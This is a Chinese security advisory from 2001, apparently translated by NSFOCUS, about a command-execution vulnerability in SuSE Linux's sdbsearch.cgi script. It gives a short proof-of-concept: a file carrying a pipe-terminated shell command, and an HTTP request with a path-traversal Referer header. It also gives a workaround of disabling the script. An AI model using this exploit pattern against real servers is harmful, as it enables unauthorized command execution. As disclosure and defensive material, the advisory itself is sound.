首页 -> 安全研究

安全研究

安全漏洞
SuSE linux sdbsearch.cgi执行任意代码漏洞

发布日期:2001-08-02
更新日期:2001-08-03

受影响系统:

SuSE Linux 6.x
SuSE Linux 7.1
SuSE Linux 7.2
描述:

SuSE Linux发行版中带了一个名为'sdbsearch.cgi'的perl脚本。

它存在一个安全问题,可能导致攻击者执行任意命令。

这个脚本信任客户端发送的HTTP请求中的HTTP_REFERER变量的内容。'sdbsearch.cgi'
利用它来作为关键字来定位文件。如果攻击者可以设法上传一个包含特定内容的文件,
'sdbsearch.cgi'将会使用open()调用来打开匹配的文件。如果文件中包含管道符等shell
元字符,攻击者就可能以httpd运行身份执行任意命令。

<*来源:Maurycy Prodeus (z33d@eth-security.net) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Maurycy Prodeus (z33d@eth-security.net)提供了如下测试方法:

首先攻击者要设法上传一个"keylist.txt"的文件。
  如果在本机测试可以执行如下操作:
  $ echo -e "keyword\0touch exploitable|" > /tmp/keylist.txt

向目标主机发送如下HTTP请求:

GET /cgi-bin/sdbsearch.cgi?stichwort=keyword HTTP/1.0
Referer: http://szachy.org/../../../../../tmp

这将会在/tmp/下创建'exploitable'文件。



建议:

临时解决方法:

暂时禁止此CGI脚本的执行权限。或者将其移出/cgi-bin/目录。

厂商补丁:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.suse.com/


浏览次数:4720
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障